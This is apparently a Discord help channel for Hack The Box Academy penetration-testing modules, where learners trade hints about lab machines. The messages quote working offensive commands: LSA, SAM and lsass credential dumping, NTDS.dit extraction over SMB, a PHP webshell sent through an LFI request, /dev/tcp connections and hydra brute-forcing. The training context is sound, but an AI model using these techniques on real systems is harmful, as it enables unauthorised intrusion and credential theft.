#modules
Hint: think about all the subdomains you're presented. One of them you can zone transfer to
You'd do it as dig axfr subdomain.inlanefreight.htb @ip
OH
Hi guys I am curious, if you start with a bad webshell or other semi interactive shell what is the first thing u do. Do u immediately get a msfvenom shell to the machine?
For the purposes of htb course
Hi all module: Attacking Common Services HARD
Question 1, What file can you retrieve that belongs to the user "simon"? (Format: filename.txt). I tried enumerating smb with smbclient, just see the shares, not able to login using the username simon, tried bruteforcing but not working, seems like all passwords are turning correct...., enumerated bruteforced all services but no chance. any tips please?
i gave up so i just made it do it automatically using a simple bash script i made
enumerate harder, you can definitely access SMB
i just made it do "dig axfr" with every other line from the output
aaahhhhhh! all of a sudden everything works. thanks.
You got it?
Don't forget the @ip
yes, but I am quite sure I tried it before, don't know why didn't work before. lol
You can also dig txt
But the axfr gives you more info for the next questions
It happens, an extra space somewhere could ruin everything
I want to be a professional in digital illustration. Python is far from my reality. But let's go!!!!! ......
⚽ 🏈
Htb has nothing to do with digital illustration
Yes I know!!!!! But I like Python a lot. I have a brother of mine who is a software engineer and how he would like to learn and pursue a career in this area as well, if you know what I mean.
funny
What do you mean?
Many people have two professions and they manage to stay that way for the rest of their lives.
Are you saying that they want to delve into application penetration testing and security?
Hello! I got stuck at Password Attacks, Attacking SAM. There is this last question about Dump the LSA secrets. I got the users through SAM dump but i cant dump remotely the LSA secrets, is ther any tip for that?
can you "spoilertag" the command used to dump remotely the LSA?
fhu im not sure how to do that 😄
Put || in front and behind the command ||lol||
Add a space after the pw
make sure to use a highly privileged user
That too
aham
Lsa dumps can only happen with enough privs
thats what i was thinking, but the hashes didn't contain any high priv user
admin field was empty
but there is probably something that im missing, thank you
You're welcome
how did you dump the sam, with samdump2? In that case just use impacket-secretsdump
i used secretsdump.py
I went to see my notes, yes it's empty so gotta enum the other users to see what priv they have then MarcieLee did the rest
thank you for the help, have a nice day
Whoever wrote the Thick-Client applications topics in Attacking common Applications is mental. All this teaches you is how to copy code
What is the biggest module in terms of content? just finishing up password attacks and she was HUGE haha
Wait til you see Windows Priv Esc or attacking + enumerating AD
I'm gonna need a bigger boat
password attacks is only an 8 hour module isnt it?
Yeah it says that on the tin but its taken me much longer
Wait til the 4 day ones lol
especially with the skills assessments, where you're brute forcing for some period of time
not complaining they are really good modules, just big chunky boys
oh yeah absolutely man! they're amazing - gg to the HTB team
I am complaining about attacking common applications as its ridiculous
haha really? what's broken
theyve just rehashed an insane box walkthrough and all it teaches is how to copy code to solve that problem
could potentially put the code into snyk add-on for vs code?
idk
sure I'll have loads of fun when I land on her haha 
you have to decompile and tweak the source code for this custom application, good in hack the box. not good in academy
guys im doing the ATTACKING ENTERPRISE NETWORKS module currently I'm trying to enumerate the blog.inlanefreight.local but every time i try to register an account or login i get the following error "The website encountered an unexpected error. Please try again later." is this part of the assessment or is it an error that should be solved ???
The timing on the modules is arbitrary to attract businesses to pay for it/enterprise training
did you ever figure this out? I am in the same boat
yes mate, im on the next one now which is just as bad, DM me
Thick client has been wildly agreed upon to be the dumbest addition to that module
yeah it just teaches you to copy code rather than understand anything
looking forward to seeing that mess lol
You still have to complete that section to take the cpts exam
doesnt mean to read it, just answer the questions
wasnt that the Java application
you need to read it to complete it
is it the Java app
yeah you need to reverse and modify it
yeah what ive been doing
just spending hours trying to get this stupid fiddly 1 time use application to work when im trying to learn
it makes sense in HTB not academy
true af
can someone explain to me how this works and why cme didn't find it? 🙂
spoilers
cme is giving a weird error related to the response received
just use hydra for FTP
try with NetExec and if it still does not work you can reach the developers in its Discord
and they will ask you to open an issue, they will fix it
Hello everyone,Module:Footprinting,Section:Hard Lab, i have found open ports, tried enum a pop3 and imap but need creds, tried braa and snmpwalk but there is nothing, trying right now a onesixtyone to bruteforce, but there is nothing also(tried 2 different wordlist), could anyone help me pls?
netexec got it, but is much slower
cant be much slower since its the same software 🤣
just renamed
cme is dead
has to be anything else
you can use threads
idk, it has like 1 sec between tries, maybe i can increase the threads
snmp is the way
the order is onesixtyone bruteforce community string and after that snmpwalk with the community string
probably because before cme was giving connection error
error was faster than successful try
Hi folks
I am preparing for the offsec OSWE exam. Which HTB Academy modules would you recommend?
i would look at the new web modules from bmdyy and vautia.
Is there any module about Recon at HTB?
there's this if that's what you mean
Can anybody please help me? I am in Linux Privilege Escalation, in the Sudo module, and I found the flag.txt using 'sudo -u#-1 /bin/ncdu cd /root,' but I can't read the contents of flag.txt.
well you could just replace cd /root with cat /root/flag.txt
but I also recommend googling about ncdu, there's a way to drop into a root shell
I am getting this error " Error: could not open /root/flag.txt │ Error changing directory: Not a directory "
Sounds like its not the right directory
mostly sounds like it's not meant to work that way
have you looked up exactly what ncdu does and how it works and what arguments it expects?
look at GTFO bins
What should I be searching for?
the binary you can exploit
Module:Windows Priv Esc
Section:Weak permissions
done everything and got a administrator group, but cannot dir a folder with a flag, could anyone help me?
Module: Local File Inclusion
Section: RCE
I understood and replied the concept for RCE using LFI, the problem is when i try to 'cat' a file, or try to trigger a reverse shell. Seems like i can only pass a single command(id, whoami) and whenever i use spaces or some other character it just doesn't execute the payload anymore. I tried to close the command in ' ' or to URL encode but neither worked. Some hints? The goal is to read the flag in /
For example this request doesn't work: ||curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=cat /flag.txt" (of course i changed the IP and PORT)||
it depends where you're injecting the parameter and how the server processes it, might need to url encode spaces etc...
or instead of trying to inject that PHP shell you could try one that spawns a rev shell
I also tried to URL encode the command but had no success. Also tried to spawn a reverse shell and this didn't work too. I'm for sure doing a dumb mistake but i can't figure it out lol
im pretty sure i done that one with just the simple web shell. is the flag defo called flag.txt and not a bunch of random numbers like some of them
Hi everyone
Does anyone could help me to solve the last question of Documenting & reporting assessment please?
Yeah u were right the flag name had a random name, i forced too much the assumption of the flag name, thanks
they do that to prevent against LFI if thats not the main aim
Yeah it makes sense, it's not the first time they did that so i don't even know why i haven't thought about it, thank you again!
hi, struggling with the lab Attacking Common Services Hard, last question, I am at the stage of looking for mssql users to impersonate, I found the user J**** only, but seems like there should be 2 impersonable users, I am really lost and have no idea what is the next step I need to take. I found the second server with as well, but have no clue how to connect to it as well.
Check for connected servers
But idk how deep you are into it
You can impersonate other users for sure though
Just follow steps in the sql section to figure it out
log out and then in back
🤦♀️
thx 👍
Hello. Why i can not own vip machine? Do i need to pay money?😪😪
Ok i see 14$/month
Not sure if this is the right place to ask, but are parrot servers down right now?
I'm getting slow speeds on both their linux distro downloads and apt repos
Read the about section of this channel and #welcome and tell me if you think that this is the right place, they have their own discord btw
Hey, hope this question is correct to ask here, but I am trying to start the browser VM and I am being told that I have 1 instance a day and I can't open it. I used a web VM for the intro module...but was that it? I cant just use that one? There was like 180 mins remaining on it. Am I missing something?
When you close it out/terminate it, that's it
You can use your own vm and download the vpn configuration file all you want
Or subscribe
I was afraid of that. Okay.
Or buy cubes
thank you @fathom pendant
Why would you be afraid of that?
Lol they're a company. They're all about making money, and the pwnbox is a convenience thing rather than a need to use thing
Like you can absolutely get by using your own vm
I mean VMs are billed by the hour, so it should be no problem just letting users use it until time is up. But like you said, they are focused on dat cash $$. So I understand.
Well their stuff is hosted in their infrastructure mostly
You're paying for the convenience to use it, and you aren't paying an hourly rate for it
Literally just give them any amount of money, i.e. buying the smallest cube option, and you get it unlimited
Forever
you'll end up paying for later content anyway ¯_(ツ)_/¯
For the tests?
No I mean you literally cannot do all of the content without paying some amount of money
Ah
Only the tier 0 content is relatively free as they full refund the cubes
So some modules you will never have enough cubes until you buy
Iirc someone did the math and it was like one month Plat and one month silver to have all the cubes for cpts
so $86 for all material?
Unless you're a uni student then do the student sub for $8/month AND you get access to all the modules up to and including tier2
👍
Hello, I am currently working on the module Web requests/POST and I cant seem to figure out how to correctly formulate the command to get the flag
Is it possible that I run this command 'rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full' and the reason why I cannot locate the 'lsass.dmp' file( using the 'dir /s lsass.dmp' command ) is because the AV software prevented that command from creating 'lsass.dmp'
What module is this?
you cannot generate it in C:
donno why
i don't know why, put it in C:\Users\<User>\
this module is this https://academy.hackthebox.com/module/35/section/224
That also didn't work for me
I also used 'Administrator' as username and that also didn't work
--data-raw instead of -d
it works with -d
oh youre doing it from windows
yea
curl is an alias for iwr
i dont know how it works there
just use parrot or kali and the usual curl
okay thank you
also you can do it from browser
changing the user agent
you create a custom device and put curl user-agent there
then enable the device emulation and voila
no because this is #module chat
read #welcome to access the rest of the server
I assume you'd also have to follow a specific pattern of unlocking, which could potentially suck
Do you still have the info?
Can you please explain me one thing. i am currently going through the web attacks module, IDOR. it talks about changing a parameter, but what if there is a post request containing only an action with no user id, for example {'new_name': 'Alex'}. i assume the user id is in the cookie. Does this apply to idor? and is it possible to hack this if for example the id is stored in PHPSESSID?
one month plat and one month gold 1500 cubes
follow the cpts path
thanks!
yes
it’s taught on the module
under protected archives iirc
what
double click it
and it will get mounted as drive
you dont need any program
that didn't happen to me
i dont know
probably 7z opens it
please someone. i tried to find this on the internet but no luck
disk management > action > attach vhd
you have to be Administrator of your PC
but this manual method should be automatically done when double clicking
any time
Anyone there that has done the Attacking Enterprise Networks Web -Enumeration & Exploitation module or has had a similar issue? I am tampering with the HTTP verb. Its just a blank response in Repeater
I'm on "Whitebox Attacks - Clientside ProtoPollution" and I think I need a sanity check, DM would be appreciated
Module:Windows Priv Esc,Section:Citrix, what i need to type here? i tried ||humongousretail.com|| but it gives error, could anyone help pls?
Module: Footprinting - Lab Hard:
Task:
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.
For now:
I was able to find the SSH key and log as ||tom||, I found some UID stuff, but nothing more, how can I continue? Does it have to do something with the info I found here ||https://gyazo.com/1811c8b8459cc7cfe2f8058670cd6f65|| I saw previous comments that talked about ||mysql|| How can I access this service?
try login to mysql, there u will found a HTB user
If you have the ssh key and got in as Tom
Duh, is there a port where it even runs the service.
Yeah I got that.
I ran through all the directories.
I did simply ls ;-;
BRUH
I thought of downloading LinEnum on the target
To escalate to admin
Nah it’s a footprinting module, not privesc
Did you mean to connect with the ssh key as in root@<ip>?
ssh -i key root@ip
Oh..lemme try that.
I thought I had to log in as tom and do shenanigans there.
It workedd.
But is that like..specific or it will require a password?
Or is it general that when I have an SSH key I can log in to root.
It’s not general
Oh so it's just this time.
Yeah this time
Thank You, I found the ||users.sql||
Alright; then I do remember correctly
Anybody here who has done Whitebox Attacks ?? I'm losing my mind over Client-Side Prototype pollution rn, I already got some XSS going....
Hi , would I use 'hklm/security' to transfer my 'lsass.dmp' from my target machine to my host machine?
exec 3<>/dev/tcp/10.10.10.32/80
any idea how to use it?
what are you trying to do here?
I am trying to move the 'lsass.dmp' file to my attacking host with the 'smbserver.py' tool.
Your smbserver command is wrong
^
I tried using on the pwnbox these commands
$ exec 3<>/dev/tcp/10.129.93.37/80
$ echo -e "GET /upload.zip HTTP/1.1\n\n">&3
my terminal closes immediately any idea why it is happening
am I using it wrong?
what do you think about skipping metasploit module?
if im experienced with it
coz i want to do attack common services
this night
Okay fixed it. Would my share now be on my attacking machine or would I have to keep the smbserver command running? I ask because I don't see it.
try to go as far as you can I guess xD
my question actually is about skipping metasploit module
i have like 4 sections done for the common services one just to answer some questions on this chat xD
The smbserver is just to transfer files once done you can stop it. Please understand the command before you run it. here you copied the lsass.dump to / directory of the attacking machine
Its my first time running it and I didn't understand it fully the first time. I live and learn, thats life
Still nobody online for Prototype Pollution?
I'm pretty sure I went down the right rabbit hole but still not getting it to work
Brute Force Skills Assessment 2
- I used cupp -i using Harry Potter's information for the password list
- I created a username list: ./username-anarchy Harry Potter > harry.txt
- I used hydra: hydra -L userharry.txt -P harry.txt -u -f ssh://94.237.59.185:47416 -t 4
It's been a half an hour now and no hit. I repeated exactly what we did in the module again, but it seems I am wrong. Please help
Shouldn't take half an hour
Hint: Try to work with minimal information for the wordlist in the beginning and gradually increase what you add using cupp
Thanks I will redo the question with less info in cupp
Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. getting no response from the ls command after logged in smb
no command is working in smb
ok
i've been trying to figure this one but i was not able to get the new name, any chance for where to look for? thanks got it
tried everything still same error
which was the smb one?
let me try in my side
it works for me with the correct share
smbclient //10.129.17.74/spoiler -U 'spoiler'
try resetting if you are doing it correctly
ty @thorn urchin
Popular unpopular opinion: Attacking thick client applications is the worst section in the Attacking Common Applications module and does not belong.
That is all, now I have more pain…err…I mean learning to do and alcohol to drink
ok I will see
yeah many time resetting helps
great how FTP service does not even wake up with target spawn in common services module 🙂
how did you solve this part? i’ve reset it 5 times but still no FTP service showing up
7 resets 🤣 niceone
hi quick question, i'm on the windows privilege escalation module - section Further Credential Theft
I'm stuck on this question: Find and submit the password for the root user to access https://vc01.inlanefreight.local/ui/login
I've got all the other questions but I'm unsure if I'm missing something or simply over-looking something very obvious.
You're doing a -p- scan yeah?
I still remember, i did like 10 to 12 resets and still couldn't manage to get the service and in the end I asked for the ports directly and then I did more resets and port scans only on those ports.
Just finished the Windows event logs and finding evil, found it quite challenging was good.
Hello! I'm stuck at the "Password Spraying" section of Using CrackMapExec. The question is "Which other account has the STATUS_PASSWORD_MUST_CHANGE flag?". The only user I can find is peter, but that doesn't work. I tried both peter and inlanefreight.htb\peter.
There is a second user with this status
Where can I find the longer username list? This is the list I'm currently using:
noemi
david
carlos
grace
peter
robert
administrator
I can't find any other lists in the module too.
At the very beginning of the module you need to create a user list. Use this list
would anybody know why the command "download" is not working in Evil-WinRM? I get an error
nevermind its working now
so weird
Eh the tool is always weird
Got it! Thank you.
always do
anyways managed to do it was just a matter of resets o.O
any idea why crackmapexec doesnt dump lsa
?
the user has privilege to get lsass.DMP
if it is not an local or domain admin
you need administrator level to dump SYSTEM memory processes
not only SeDebugPrivilege
well but this tells me to do so
yes with a minidump then
use pypykatz from linux or RDP and do it from the task manager
i manually created dump from task manager and transferred it to my machine, but idk how to crack it
pypykatz for example
I'm back at the Client Side Prototype Pollution from Whitebox Attacks.. anybody here who can give a sanity check?
the names scheme now is tool.py
anyways this is weird i just noticed you are installing impacket-scripts
you git cloned it
the best way to install is pipx
check the file pointed by the symbolic link
👀
just install it following the github repo instructions
then
cd /opt/impacket
pipx install .
easy as that
It also probably doesn't help you're moving around as root
Oh wait nvm
I'm dumb
I'm used to root being the red color
Not regular user
But yeah tbh why are you su to root to do things?
be careful what you install with impacket, it really wants to break
but here some stuff i used to install impacket in a virtual environment (on the pwnbox)
wget https://github.com/fortra/impacket/releases/download/impacket_0_11_0/impacket-0.11.0.tar.gz; tar -xf impacket-0.11.0.tar.gz;cd impacket-0.11.0/
virtualenv --python=python3 impacket
source impacket/bin/activate
python3 setup.py install
nice
dont use virtualenv if you can use pipx
oh no that's just for quick testing, i mainly used pipenv shell now
Aye, will going to college help with hacking? Like computer science or coding classes or what?
read the instructions from the source 🤣
this isn't really the place for that bro
not the right channel, read #welcome
Most you'll get out of college is cybersec (aside from clubs)
good morning all, currently doing the Bypassing Encoded References within the Web Attacks module, and having an issue with the script to get the 20 employment_contracts.
So the code I have at the moment is:
```bash
# outer loop over the 20 contract ids (reconstructed: $i and the second 'done' imply it)
for i in {1..20}; do
    # the hash is md5(base64(i)), as the module's encoding chain describes
    for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
        curl -sOJ -X POST -d "filename=contract_$hash.pdf" http://<server>:<port>/download.php
    done
done
```
I've had a look through Burp and thats how I came up with the 'filename=' part (oh and obviously i've changed the IP and Port lol). I don't know what it is with this module, i understand the concept but just can't seem the get the parameters correct. Any help greatly appreciated.
Because you're using backticks instead of single quotes here it's fucking with your formatting lol
i was wondering why the formatting looked terrible, it wasn't like that when i was typing. i'll reedit
does someone knows why I am getting this weird output? and why is after my port 1234 the number 72 (green)? Every time I press enter, a new one appears: "PS C:\Users/name"
Don't forget the semicolons to end your statements
Hello I am in module Linux Local Privilege Escalation - Skills Assessment and i am trying to get the flag5 but the sudo busctl doesn't give me a root shell. Any help?
Thank you I solved it !!!!!
Hey guys, quick Q about Joomla template code, does it decrypt md5 automatically ??
@acoustic owl you helped me with whitebox attacks, ppollution, can I DM you for a sanity check for Client-side pollution?
I have solved this in another way, try to have a look at the code for "contracts.php" in the "Debugger" when you open "inspector". From there you can write a quick script as well. Don't just copy and paste the code from the learning material, try to do it yourself
sure
cool thanks I'll have as look 🙂
I'm currently stuck here too. The services.exe is incorrect. I can't sleep HAHAHA
Go to the log entry referred to and see what happens after that
After that you should be able to sleep again 😉
"But I guess my best wasn't good enough"🎶 🤣 😴
I have told you what you have to do. Look at the log entries, directly after the specified entry.
Oh, my God! You saved me! 😭 Thank you so much
Sleep well 🙂
Hello! I'm currently doing Intro to assembly module and I've run into an issue regarding debugging elf files. When I try gdb -q ./hello_world I get:
Reading symbols from ./hello_world...
(No debugging symbols found in ./hello_world)
I also tried debugging the elf file given in section Assembling & Disassembling but I got the same result
Hi , I am having trouble copying the ntds.dit file from the VSS volume drive. I have tried the command twice with two different path locations.
Apparently I had to add -g when assembling the helloWorld.s file. Issue solved
read the error message it tells you why you cannot copy the file there
Now that I have the 'NTDS.dit' file copied onto my attacking machine, what can I do with it?
Crack passwords
you can dump it with netexec
a.k.a cme
would secretsdump.py work since its a SAM database?
you need the SYSTEM
How am I supposed to use Words.GetWordList() in the introduction to c# - skill assessment?
I already found out how to iterate through a wordlist but still have no idea what to do with the Words.GetWordList(), this is my current code:
```csharp
using System;
using System.Collections.Generic;

class Program
{
    public static void Main(string[] args)
    {
        // placeholder list; the module's Words.GetWordList() is supposed to supply the real wordlist
        List<string> path = new List<string>() { "a", "b", "c" };
        foreach (var item in path)
        {
            Console.WriteLine(item);
        }
    }
}
```
do I need to go back to my WINDOWS machine to determine where the SYSTEM is or is the SYSTEM in the same file location on every windows machine?
the SYSTEM from the machine where u got the ntds
but all of this process is automated with crackmapexec
The -target-ip isn't the target?
Oh I know. I already got the answer with crackmapexec. The section wanted me to do the longer method too and I want to know it
for this to work you have to dump with LOCAL flag
you have to transfer SYSTEM to your machine
So I have to execute a command like this (cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\CompData) but only for the SYSTEM and not the NTDS.dit?
you need both in your machine
can anyone assist in helping me with the passwd opasswd shadow section of password attacks module i am struggling to complete the question
yes just ask
could you help me i am asking
please help me with this, been stuck on this thing for days
could you help me i am asking
so i want to know the root password from the shadow file but can't copy it to the attack box, no permissions. i log in as user will and find the .backups but can't open or copy them to unshadow
set up an http server and download em from your machine
could you explain how to do that
good module to learn about this stuff
take a look
hey guys currently at attacking common service module for RDP cant figure out how to pass the hash from the admin or more where can i find it (im not supposed to use mimikatz)
im still having difficulty could you walk me through the steps
rdp section?
yes sir
yeh already added the reg key but how am i supposed to know the NT hash buddy
its on the desktop
in a txt
RDP to 10.129.203.13 with user "htb-rdp" and password "HTBRocks!"
there
my stupid head didnt even open the txt my fault bro sry for bothering you
appreciate you raf
enum is key
it is ❤️
its already cracked
instead of the wordlist
add --show
hashcat -m 1000 <hash> --show
ofc its the same from CME
Haven't done the section, but I could try to help. DM?
hi y'all, I'm struggling to find the answer for the question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) into ACL enum section under Active Directory enum & attack
so far I tried by bloodhound and PowerView
bloodhound is not showing too much and PowerView is taking a live to show a command output
sweet, DM?
Reading the section, It says that the wordlist that you need to iterate through can be accessed with Words.GetWordList() method. That's what it's for.
You'd need to reference the Assembly.dll library into your project to use it.
Anyone is doing this module "ACTIVE DIRECTORY ENUMERATION & ATTACKS"?
anyone can have an idea why is this error:
? : The term '_.SecurityIdentifier' is not recognized as the name of a cmdlet, function, script file,
a lot of us, just put your concern and if someone can help will help....
Ask the actual question you want an answer to or a nudge with and you will get a response this way
What's the context? If its part of a module e.g. powerview, did you import it into the current shell?
Because you're trying to call a function/something that isn't imported into the current shell.
yup, PowerView.ps1 was previously imported, I'm trying to grab the last flag from ACL Enum section under AD Enum And Attack module
Recheck your command
Also just FYI you know powerview needs to be imported in different shell instances so if you open a separate shell as a user it has to be imported there too
Hello guys
I- it my f- first day of joining
Hi guys
It's my first day of joinin
Pls I wanna learn some hacking
thank you bud, typo error
Hey man
I'm new
Your help will mean much to me
hey @hazy hollow lots of us are new in this as well, just put your comment, question, concern and someone who can help will, no worries about that....
No worries, copy and paste from your notes is your friend
LoL u r completely right, but sometimes I try to do it manually to reinforce the command in my brain
Go to #general this is for HTB modules
I'm studying the cpts to certify and at the same time to have strong foundations for other certs like PNPT & OSCP trying to get in into the pentesting | red teaming field...
Hello I have a problem on the exercise (transfer file). I have a flag but it is not valid, so I looked at a video and it is the identical flag, what should I do?
hey guys im currently doing ATTACKING ENTERPRISE NETWORKS blind and i have managed to get a foothold and escalate privilege to root. im currently scanning the internal network with dynamic port forwarding and nmap with this command "nmap -v -Pn -sT 172.16.8.0/23 --proxy socks4://127.0.0.1:9050 -oN scan.txt" and i noticed it took more than 3 hours and it still hasnt finished. is there any tips to make it faster, and in the CPTS exam will it take the same time ???
Make sure you have no spaces at the beginning and ending of the flag while submitting
This is the answer @dreamy solar
did you extract the file in the ".zip" archive?
yes ok, but I can't see the extracted file...
Also have you ensured that the file you uploaded has the same hash as the original to ensure the transfer was successful?
gunzip -S .zip upload_nix.zip
hasher <filename> and not cat <filename>
oh I am bad
Ok thanks you very much
If you have access to the external/internal machine instead making a nmap scan why don't you try a pingsweep on 192.168.8.0/24?
Been there
tried didnt work
```
proxychains fping -asgq 172.16.8.0/23
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
510 targets
0 alive
510 unreachable
0 unknown addresses
2040 timeouts (waiting for response)
2040 ICMP Echos sent
0 ICMP Echo Replies received
0 other ICMP received
```
you can't ping through proxychains
only TCP packets
opsss let me re try from the foothold
hello guys
im doing the web proxy module
in the skill assessment
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I did all the necessary steps
but when I'm getting the results of the attacks
I cannot find the correct one, they all have the same length, all with 200 OK responses
it worked, thank you so much, wow it took me forever scanning
did you check the "content-length"?
btw I found that all the cookies show the flag after sending them to the repeater
XD
can someone help me solve the passwd shadow section
trying to get the root password, I can get in but can't seem to have any permissions
can you share with us the module, the section, then the question
if you can, so I'll be able to help you, brother
password attacks
passwd opasswd shadow
Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.
I got into will then ls -al and found .backups, then ls passwd.bak and shadow.bak, but can't open shadow.bak or transfer or open it to get the hash
also got sam's password
Use unshadow and put the output in the /tmp dir
Then transfer to your local machine to crack the pass
If it didn't work tell me so I'll go redo the exercise
i dm you
I don't think unshadow is on the target machine. You should be able to transfer the files
I'll redo the task
lets go
I am trying Exercise 3 from Google Hacking. On and on for 3 weeks, but no result/answer. Can someone give me a nudge? It is starting to take the fun out of the PEN-200 path.
So Google Hacking from Info gathering/Passive gathering
You should post what you've tried and the exact question and it'll be easier for someone to provide help
Well, I looked and searched on all major social media platforms. And tried Google dorking.
Exact q is: What other MegaCorp One employees can you identify that are not listed on www.megacorpone.com?
Hello everyone! Module: Password Attacks, Section: Pass the ticket from Linux; Question: which group can connect to LINUX01? I'm stuck - any hint?
Which module, which section?
What have you already tried?
@acoustic owl first of all I'm a total newbie! Tried enum4linux
There is no Google Hacking
@acoustic owl also evil-winrm and tried sharphound.ps1 but no luck
hey guys, sorry to interrupt the conversation, but I'm struggling with this https://academy.hackthebox.com/module/77/section/853 for more than 5 hrs already. I've done everything, I got root access, but when I want to get the root/root.txt file like this cat root/root.txt it just doubles the text I type and nothing happens. Any ideas? please
Look in the module how it was done there
Don't worry, everyone here started from scratch.
also I tried with metasploit, but always getting [-] stdapi_fs_stat: Operation failed: 1
This is not from HTB Academy …
ah, I'm sorry
That group they say to ask here. So what is it?
my brain is like mashed potatoes already
So getting send there and back here. Nice!
this is HTB academy
If you go back they will just say Try Harder
This is about modules in the HackTheBox Academy
Wait wait wait. Totally my fault. Mixed the 2 up.
well it is 😄
😹
@acoustic owl which section? can't find it
Doing 2 paths at the same time.
no problem mate
Sorry for that guys. Have a great evening.
in the PtT section, the command you need is id
With?
well it's night for me, but I started in the evening 😦
hey guys, sorry to interrupt the conversation, but I'm struggling with this https://academy.hackthebox.com/module/77/section/853 for more than 5 hrs already. I've done everything, I got root access, but when I want to get the root/root.txt file like this cat root/root.txt it just doubles the text I type and nothing happens. Any ideas? please
this one, please 😦
Did you upgrade your shell?
I'm quite new to this, but I guess I updated everything
Also you'd need to cat /root/root.txt
Tried with metasploit too, but got some error as well
Just follow through the section
I tried, but whatever I type it shows doubled and no response
It walks you through it
I've been doing it for more than 5 hrs
You probably skipped something
but when I gain root access and type any command and send it, then it just doubles the command and does nothing
Hello
Because you're not in a full shell probably
probably your shell is broken
how do i fix my shell?
explained in the module iirc
Did you do the command as shown in the module to gain access?
Yes i did everything, really :/
@sly dome thx, had the command but didn't see it, thx
iirc?
python3 -c 'import pty;pty.spawn("/bin/sh")'
It's an abbreviation for "if I remember correctly"
I did that
Could you please send some screenshots then?🤔
ah, alright
Respawn the box and start from the top
I closed it, but I'll do it again
give me 10 mins guys, I'll be back
They can't post screenshots, their main account isn't linked to the discord
Before you can send printscreens, you must verify your user. Read and follow #welcome
Oh
But really I tried a couple of times
You probably skipped steps
Will try again tomorrow
I guess I should take rest now 😄
WIll give feedback tomorrow
is there a chance that maybe I copied LinEnum.sh wrongly, maybe with some space or something?
I will try it now 😄 I won't get to sleep otherwise
LinEnum shouldn't be necessary I don't think
btw I was using MATE terminal
(Also linenum wouldn't break a shell)
You should be using LinPeas.sh from the nibbler user, but the purpose of that script is only for you to identify the path to root
In the module they use LinEnum.sh
...which you are offered directly in the learning material on the page you linked. That said it's of course good practice to copy over files still
Just take it one step at a time
^
Don't skip over steps
Don't move forward too fast then try and catch up
Just follow the module verbatim
Ok, will keep you posted soon
So I did it again
👀
and same happens
I sent once and it's doubled again 😦
but here is correct
connect to [10.10.14.170] from (UNKNOWN) [10.129.100.178] 36502
whoami
root
Mhm
weird is that it does not even say who sent that cat ...
and I cannot do anything, it's like writing in notepad 😦
You got a response
it doesn't respond to anything except ctrl c
...
the response is the same thing I type
that was in different terminal
in terminal nibbler it does not work
Yes
is it in that?
That's expected
it works now
nibbler is acting as a backdoor for you now. it's "blocking" as long as the root shell is active. It's the root shell you need to use now
Reading is important
Thank you so much
The section even tells you
I guess ill never forget it
There you can spawn the python pty
Yeah, I am an idiot
Hehe thank you so much
I may be stupid but I'm not an idiot
almost midnight, wanted to sleep, but hell with sleep 😄 going further
Rest is important
we just got more experience at being dumb, Marcie 
It helps you to avoid simple mistakes
Will try to login with different email here, seems like mine got blocked while i was trying first time
That is also true
App.hackthebox.com and academy.hackthebox.com are separate logins
Maybe I'll keep it for tomorrow then. A similar task is waiting
hi did you solve the passwd opasswd and shadow section
A long time ago
I know, I mean discord, I registered my HTB email but then I got an email that it got blocked for spam or something
could you guide me on what I'm doing wrong
Not gonna guide you
Anyways guys, thank you so much! You saved me a good night's sleep
Just tell you to file transfer
I can't transfer the files or unshadow them
The backup is in a user directory
i got into backups
permission denied
goodnight Neu, congrats on the progress
What directory are you in?
And you are that user, yes?
will@nix01
??
Type pwd
hello guys
/home/will
I'm stuck at Footprinting lab - Hard
when I try to ssh
this is what i get
ssh tom@10.129.202.20 -i id_rsa
Load key "id_rsa": error in libcrypto
tom@10.129.202.20: Permission denied (publickey)
Sounds like the key you have for tom is not correct, try another user?
Is the rsa key formatted correctly?
Does it have the ----BEGIN and ----END lines
file transfer still not working trying wget
failed: Connection refused.
You don't have to hit reply on all my messages
oh my bad
Especially when it's unrelated to me trying to help you
yup that was missing
thanks my man
understood
just do transfer files module
Hello everyone, I feel enlivened to be part of the HTB Discord community. As a beginner in InfoSec I have high anticipations for what my learning outcome would be as a member of this community, especially as I'm choosing to go by the 'playing by the rules' doctrine in mind.
I have done about every transfer method and it's not working
I keep trying and it just gets me further into some hole
Python http server worked fine for me
Did you specify the port?
Welcome.
A good first step would be to verify your user. Read and follow #welcome
hey anybody know how to authenticate as a different user into PowerShell?
I think it's runas?
I just used google ¯\_(ツ)_/¯
ok, my google skills suck.....
feel like I am missing something with x64dbg... how does one get the entries to stop bouncing around in the memory map? I've tried pausing with no luck. I can't reasonably read any of the content in there because it just bounces around so much.
Thanks for the tip @acoustic owl , a yellow exclamation mark, gave a notification after I finished reading the rules, to say hello and I decided to go with the flow. I'll be on the verification process now.
That's a discord thing
Not necessarily a setup thing
It "recommends" you to do something
Did you get it working?
what's above "hacker" in htb?
will@nix01:~$ wget 10.10.15.16:8000/shadow.bak
--2023-10-21 21:44:48-- http://10.10.15.16:8000/shadow.bak
Connecting to 10.10.15.16:8000... connected.
HTTP request sent, awaiting response... 404 File not found
2023-10-21 21:44:48 ERROR 404: File
Oh
Yeah you're just dumb @wary tendon
@fathom pendant I get that now, I have some learning to do that is. The discord UI most especially.
You need to start the http server from the .backups directory
And do wget from your attack machine
Wget is a DOWNLOAD command
how did you make your way until that section
Ways to realize this sooner:
what does wget do?
That's it
having trouble listing shares: root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_HRJDux
Default principal: julio@INLANEFREIGHT.HTB
So I have a valid ticket for julio but can't list shares: smbclient //dc01/C$ -k -c ls -no-pass
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
